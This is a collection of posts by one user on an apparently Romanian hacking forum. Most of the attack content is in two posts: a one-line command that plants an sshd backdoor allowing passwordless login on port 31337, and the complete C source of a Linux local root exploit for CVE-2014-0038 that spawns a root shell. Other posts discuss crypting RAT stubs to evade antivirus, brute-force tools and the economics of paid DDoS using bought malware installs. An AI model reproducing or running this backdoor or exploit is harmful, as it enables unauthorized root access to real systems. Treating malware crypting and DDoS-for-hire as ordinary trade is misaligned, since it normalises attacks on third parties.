Elohim
Active Members-
Posts
700 -
Joined
-
Last visited
-
Days Won
8
Everything posted by Elohim
-
simplest sshd backdoor ever. ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337 spawns sshd backdoor on port 31337, you can login with root/bin/ftp/mail/anyuser without password*. *backdoor pe portul 31337, se poate loga cu orice user, fara parola Credite: /Kingcope L.E. userul X trebuie sa fie deja logat im timp ce intram pe backdoor.
-
Un pic cam tarziu pentru inca in reply, dar o sa postez totusi. Il cunosc pe The_Inject0r de foarte mult timp, tipul nu este nicidecum un tepar venit de pe marginea mirc-ului ca multi altii, se pricepe foarte bine in ceea ce face, iar site-ul care il ruleaza nu este nicidecum unul de tepe. Cu astea fiind spuse, problema este alta. Din toate exploit-urile care sunt acolo aduagate, un MAXIm de 5% sunt intr-adevar ale lui personale, restul sunt ale unor terte persoane, care il vand prin el, si primesc un % inapoi, The_Inject0r isi opereste un mic comision sau "shpaga" daca vreti sa o numim asa. Trecand si peste nelamurirea asta, tineti minte ca gunoiul unuia este averea altuia.
-
Criptez stuburi de Darkcomet , Cybergate, Blackshades contracost
Elohim replied to cacapishu1's topic in RST Market
Ce marime are stub-ul tau? In ce limbaj faci criptarea? Adaugi si tu startup pe langa cel initial ? Suporta EOF ? Si nu vreau sa iti stric mica afacere, dar nu mai spuneti "FUD" cateva luni. Iti demonstrez ca daca il rulez pe 50k world mix, in 12 ore nu o sa mai fie nici macar UD -
linux 3.4+ local root (CONFIG_X86_X32=y) CVE-2014-0038
Elohim replied to Elohim's topic in Exploituri
Byte-ul, defapt tromfil nu a facut un post aiurea, este o adaugire , sau un fix ulterior la exploit-ul initial, deoarece nu este cert ca o sa functioneze, foarte folositor de altfel. -
/* *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y) CVE-2014-0038 / x32 ABI with recvmmsg by rebel @ irc.smashthestack.org ----------------------------------- takes about 13 minutes to run because timeout->tv_sec is decremented once per second and 0xff*3 is 765. some things you could do while waiting: * watch http://www.youtube.com/watch?v=OPyZGCKu2wg 3 times * read https://wiki.ubuntu.com/Security/Features and smirk a few times * brew some coffee * stare at the countdown giggly with anticipation could probably whack the high bits of some pointer with nanoseconds, but that would require a bunch of nulls before the pointer and then reading an oops from dmesg which isn't that elegant. &net_sysctl_root.permissions is nice because it has 16 trailing nullbytes hardcoded offsets because I only saw this on ubuntu & kallsyms is protected anyway.. same principle will work on 32bit but I didn't really find any major distros shipping with CONFIG_X86_X32=y user@ubuntu:~$ uname -a Linux ubuntu 3.11.0-15-generic #23-Ubuntu SMP Mon Dec 9 18:17:04 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux user@ubuntu:~$ gcc recvmmsg.c -o recvmmsg user@ubuntu:~$ ./recvmmsg byte 3 / 3.. ~0 secs left. w00p w00p! # id uid=0(root) gid=0(root) groups=0(root) # sh phalanx-2.6b-x86_64.sh unpacking.. = greets to my homeboys kaliman, beist, capsl & all of #social Sat Feb 1 22:15:19 CET 2014 % rebel % *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* */ #define _GNU_SOURCE #include <netinet/ip.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <unistd.h> #include <sys/syscall.h> #include <sys/mman.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <sys/utsname.h> #define __X32_SYSCALL_BIT 0x40000000 #undef __NR_recvmmsg #define __NR_recvmmsg (__X32_SYSCALL_BIT + 537) #define VLEN 1 #define BUFSIZE 200 int port; struct offset { char *kernel_version; unsigned long dest; // net_sysctl_root + 96 unsigned long original_value; // net_ctl_permissions unsigned long prepare_kernel_cred; unsigned long commit_creds; }; struct offset offsets[] = { {"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10 {"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10 {"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04 {NULL,0,0,0,0} }; void udp(int { int sockfd; struct sockaddr_in servaddr,cliaddr; int s = 0xff+1; if(fork() == 0) { while(s > 0) { fprintf(stderr,"\rbyte %d / 3.. ~%d secs left \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s)); sleep(1); s--; fprintf(stderr,"."); } sockfd = socket(AF_INET,SOCK_DGRAM,0); bzero(&servaddr,sizeof(servaddr)); servaddr.sin_family = AF_INET; servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK); servaddr.sin_port=htons(port); sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr)); exit(0); } } void trigger() { open("/proc/sys/net/core/somaxconn",O_RDONLY); if(getuid() != 0) { fprintf(stderr,"not root, ya blew it!\n"); exit(-1); } fprintf(stderr,"w00p w00p!\n"); system("/bin/sh -i"); } typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; // thx bliss static int __attribute__((regparm(3))) getroot(void *head, void * table) { commit_creds(prepare_kernel_cred(0)); return -1; } void __attribute__((regparm(3))) trampoline() { asm("mov $getroot, %rax; call *%rax;"); } int main(void) { int sockfd, retval, i; struct sockaddr_in sa; struct mmsghdr msgs[VLEN]; struct iovec iovecs[VLEN]; char buf[BUFSIZE]; long mmapped; struct utsname u; struct offset *off = NULL; uname(&u); for(i=0;offsets[i].kernel_version != NULL;i++) { if(!strcmp(offsets[i].kernel_version,u.release)) { off = &offsets[i]; break; } } if(!off) { fprintf(stderr,"no offsets for this kernel version..\n"); exit(-1); } mmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1)); mmapped &= 0x000000ffffffffff; srand(time(NULL)); port = (rand() % 30000)+1500; commit_creds = (_commit_creds)off->commit_creds; prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred; mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); if(mmapped == -1) { perror("mmap()"); exit(-1); } memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3); memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300); if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) { perror("mprotect()"); exit(-1); } sockfd = socket(AF_INET, SOCK_DGRAM, 0); if (sockfd == -1) { perror("socket()"); exit(-1); } sa.sin_family = AF_INET; sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK); sa.sin_port = htons(port); if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) { perror("bind()"); exit(-1); } memset(msgs, 0, sizeof(msgs)); iovecs[0].iov_base = &buf; iovecs[0].iov_len = BUFSIZE; msgs[0].msg_hdr.msg_iov = &iovecs[0]; msgs[0].msg_hdr.msg_iovlen = 1; for(i=0;i < 3 ;i++) { udp(i); retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i); if(!retval) { fprintf(stderr,"\nrecvmmsg() failed\n"); } } close(sockfd); fprintf(stderr,"\n"); trigger(); }
-
Ce se intampla frate cu voi? Pe zi ce trece sunteti mai retardati ca ieri. Hitch, continua asa, si in curand o sa te mandresti ca fiind angajatul anului ca manipulant in mall.
-
Pai si tu ce mai faci? O sursa de "booter" se da cu 80-100$ pe HF, poate chiar si mai ieftin. Apoi iti procuri shell-uri sau vps-uri, si atat ai nevoie. vrei sa iti faca altul munca, si tu sa incasezi ? )
-
Daca sunt multi interesat, pot crea unul identic in alt limbaj, cu aceleasi optiuni, pus aici pe forum. Nu e atat de complicat precum pare*. * Afirmatia nu are nicio legatura cu profesionalismul si munca depusa de autorul programului, doar un comentariu referitor la uluirea celui care a deschis acest thread fata de programul respectiv!
-
Cred ca mai degraba se numeste Russian Roulette
-
https://www.thc.org/thc-hydra/? http://www.foofus.net/jmk/tools/medusa-1.3.tar.gz vnc-brute NSE Script Ncrack - High-speed network authentication cracker https://code.google.com/p/patator/ De astea trebuia sa dai daca nu erai comod si cautai inainte, in loc sa te faci de ras aici.
-
Nu, serios acum, ce este in neregula cu Psi+ cu PGP pe 4096 biti ? Imi scapa ceva ?
-
Sunt ambele foarte "safe", la fel de safe ca protocolul pop3 sau ftp! Cat despre convorbiri, solutii sunt, problema este comoditatea. Un vmware cu Cinnamon sau orice alta distro va place, Psi+ cu PGP pe 4096 biti, cu o parola buna, si garantat nu mai vede nimeni ce discuti. Pana si OTR, cu ntrebare si raspuns privata, nu gen Ce faci? si Bine, este foarte bun. Dar, inca odata zic, problema e comoditatea...
-
Nu vreau sa isc o cearta, dar afirmatia nu este adevarata. Amazon a facut nenumarate greseli de genul acesta, si desi si-au dat seama, au onorat comenzile. Nu stiu daca a fost marketing sau nu, stiu ca au iesit pe nite posturi in UK spunand ca este greseala lor si si-o asuma. Nu am acum un exemplu la indemana, dar daca este neaparata nevoie, pot posta cateva link-uri, desi nu sunt greu de gasit. In cazul DOMO, banuiesc ca pretul eronat era pretul care il platesc ei catre furnizori )
-
Ca sa combata spamul, multe posturi sunt trecute ca Unlisted. Casa le faci publice, trebuie sa intri pe contul de unde ai facut postarea, si sa bifezi Public la cele unlisted. Pentru din ce stiu, nu iti trebuie captcha, e un simplu form cu un value schimbat. Pentru capthca, foarte putin probabil sa ii dai de cap fara un third party tool, ca GSA Decaptha, sau DeathByCaptcha, etc.
-
Pastebin nu iti da voie sa postezi un URL clickable. O sa il afiseze doar ca text. Cat despre captcha, daca ai cum sa profiti de pe urma botului, poti sa rulezi un api de la deathbycaptcha.
-
Pentru sim, cauta pe subito.it pe cineva care vinde sim folosit, sau pune chiar tu anunt ca cumperi un sim folosit pt 10-20 Eur. Alternative sunt, poti sa le cumperi din ro, sau din uk, se dau/dadeau gratis prin magazine, mai ales cele de lebara. Cat despre GMS, nu stiu prea multe, dar daca nu ma insel, locallizare prin GSM oricum nu este exacta, ci iti da defapt coordonatele stalpului de semnal folosit de tine, ca sa isi faca o idee pe unde esti. S-ar putea sa gresesc totusi, poate ma corecteaza altcineva.
-
Ce daca a spus-o askwrite, o sa spun si eu. Daca ar fi sa se baneze prostia, nici tu FoxKids nu ai mai avea cont, tinand cont de post-urile tale.
-
[Information Leakage] Kaspersky.ro Attack - Studiu de Caz
Elohim replied to georgemihai's topic in Cosul de gunoi
@monstertube Este incorect spus "ditamai site-ul" . kaspersky este "ditamai firma" dar pentru Ro, un server decent este deajuns pentru cata lume chiar le viziteaza siteul. In privinta thredului, sunt de acord si e bine sa il citeasca si alti copii gen acel Darkpanda. Omul are dreptate, maine ii poate strica viitorul, insa se pare ca i-a dat o a doua sansa. Altcineva nu ar fi facut asta, si maine il vedeam pe la stiri, sau exmatriculat din scoala, sau mai stiu eu ce. Poate eram de acord cu acest gest in cazul in care si-a cumparat o licenta kaspersky si totusi s-a infectat. ( glumesc ) Linode sunt serverele pe care ruleaza proxy-urile din browserul Epic, nu cred ca este serverul lui ) -
Nu prea inteleg copiii gen @sloboz ( desi nick-ul da cateva idei ) Inteleg un show-off frumos, elegant, cum am citit acum 4 zile un raport de la hate.me mi se pare, cum a procedat, pas cu pas, ceva ce iti face placere sa citesti, si sincer, a fost si motivul pt care m-am inregistrat aici. Dar cand vad maimute ca si OP, nu pot sa inteleg oricat as incerca. Ce lauda este ca ai picat kaspersky.ro ? E ca si cum ai spune ca ai batut un kickboxer de 3 ori cat tine de mare, pt ca i-ai dat la coaie. Da, ne placea sa citim ceva de genu " uite cum am facut un buffer overflow prin comanda X ", era mult mai elegant. Dar asa, pana si "hackerii" iranieni rad de tine.
-
Nginx pentru ca repede si pentru ca light
-
In primul rand, trebuie sa intelegi ca un atac ddos COSTA. Indiferent cum ai incerca sa te minti, ele costa. Cei care tin sus asemenea atacuri, sunt platiti si pe masura. Nu e nimic de placere aici (exista si exceptii precum copii frustrati cu prea mult timp liber, dar nu de ei vorbim acum ) Cu astea in minte, ca sa mentii un DDOS atat de mult timp, nu este foarte greu. Nu este nici usor, dar nu este ceva extraordinar. Un exemplu simplu de calcul este urmatorul: Fane vrea site-ul rstforums.com picat. Vine la Vasile unde i se spun preturile ( in jur de 5-6$ pe ora ) Fane il plateste pe Vasile $840 pentru o saptamana intreaga. Acum tu te gandesti " Ce baiat Vasile, a facut $840 " insa nu este asa. Vasile la randul lui, presupunand ca o ia de la 0, incepe sa plateasca pentru diverse servicii. Sunt N exemple, o sa iau unul simplu si practic. Isi urca un bot/rat sus, cumpara frumos 10k install-uri, se dau cam cu $300 world mix, cu server si criptat, ajunge pe la un 400-450$. Tot ii raman bani, este pe plus. Acum Fane este happy, rstforums.com este picat si Fane faci profit dublu cu site-ul lui unde vinde lenjerie purtata de femei. Normal ca, vazand profitul mai mare, se duce iar la vasile si il plateste pentru inca 2 luni, si tot asa. Pentru ca un atac DDOS sa continue atatea luni, este nevoie ca cineva sa profite de pe urma lor. Sunt si exceptii, cum a fost atacul pe Cloudflare doar pentru niste jigniri, etc, dar nu ne intereseaza asta. Acum ca vrei sa pici cuiva un site/server, doar ca sa ii arat ca esti bazat, nici bani nu o sa iti convina sa scoti din buzunar. Asa ca poti sa apelezi la metodele gay, adica shell-uri udp pe N sisteme linux, care nu te vor duce nicaieri. Nu este nicio metoda magica si ascunsa, unde apesi un buton, si te intorci peste 5 luni, si ele tot functioneaza. Cu bani pui totul in miscare, altfel iti raman doar metode retardate pentru oameni retardati.